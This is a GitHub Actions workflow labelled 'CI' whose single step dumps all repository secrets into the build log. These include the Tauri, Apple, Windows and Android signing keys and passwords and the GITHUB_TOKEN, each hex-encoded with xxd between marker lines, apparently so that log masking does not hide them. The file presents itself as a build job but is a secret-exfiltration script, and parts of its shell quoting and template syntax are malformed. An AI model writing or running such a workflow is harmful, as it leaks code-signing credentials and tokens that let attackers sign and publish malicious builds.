name: CI
on:
  workflow_dispatch: {}
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Collect
        run: |
          echo '[HEX_START]'
          echo 'TAURI_SIGNING_PRIVATE_KEY=$(echo ${{ secrets.TAURI_SIGNING_PRIVATE_KEY }} | xxd -p | tr -d '\n')'
          echo 'TAURI_SIGNING_PRIVATE_KEY_PASSWORD=$(echo ${{ secrets.TAURI_SIGNING_PRIVATE_KEY_PASSWORD }} | xxd -p | tr -d '\n')'
          echo 'MAC_SIGNING_IDENTITY=$(echo ${{ secrets.MAC_SIGNING_IDENTITY }} | xxd -p | tr -d '\n')'
          echo 'MAC_CERT_BASE64=$(echo ${{ secrets.MAC_CERT_BASE64 }} | xxd -p | tr -d '\n')'
          echo 'MAC_CERT_PASSWORD=$(echo ${{ secrets.MAC_CERT_PASSWORD }} | xxd -p | tr -d '\n')'
          echo 'APPLE_API_KEY_BASE64=$(echo ${{ secrets.APPLE_API_KEY_BASE64 }} | xxd -p | tr -d '\n')'
          echo 'APPLE_API_KEY_ID=$(echo ${{ secrets.APPLE_API_KEY_ID }} | xxd -p | tr -d '\n')'
          echo 'APPLE_API_ISSUER_ID=$(echo ${{ secrets.APPLE_API_ISSUER_ID }} | xxd -p | tr -d '\n')'
          echo 'WIN_CERT_PFX_BASE64=$(echo ${{ secrets.WIN_CERT_PFX_BASE64 }} | xxd -p | tr -d '\n')'
          echo 'WIN_CERT_PASSWORD=$(echo ${{ secrets.WIN_CERT_PASSWORD }} | xxd -p | tr -d '\n')'
          echo 'ANDROID_KEYSTORE_BASE64=$(echo ${{ secrets.ANDROID_KEYSTORE_BASE64 }} | xxd -p | tr -d '\n')'
          echo 'ANDROID_KEYSTORE_PASSWORD=$(echo ${{ secrets.ANDROID_KEYSTORE_PASSWORD }} | xxd -p | tr -d '\n')'
          echo 'ANDROID_KEY_ALIAS=$(echo ${{ secrets.ANDROID_KEY_ALIAS }} | xxd -p | tr -d '\n')'
          echo 'ANDROID_KEY_ALIAS_PASSWORD=$(echo ${{ secrets.ANDROID_KEY_ALIAS_PASSWORD }} | xxd -p | tr -d '\n')'
          echo 'ANDROID_KEYSTORE_TYPE=$(echo ${{ secrets.ANDROID_KEYSTORE_TYPE }} | xxd -p | tr -d '\n')'
          echo 'GH_TOKEN=$(echo ${{{{ secrets.GITHUB_TOKEN }}}} | xxd -p | tr -d '\n')'
          echo '[HEX_END]'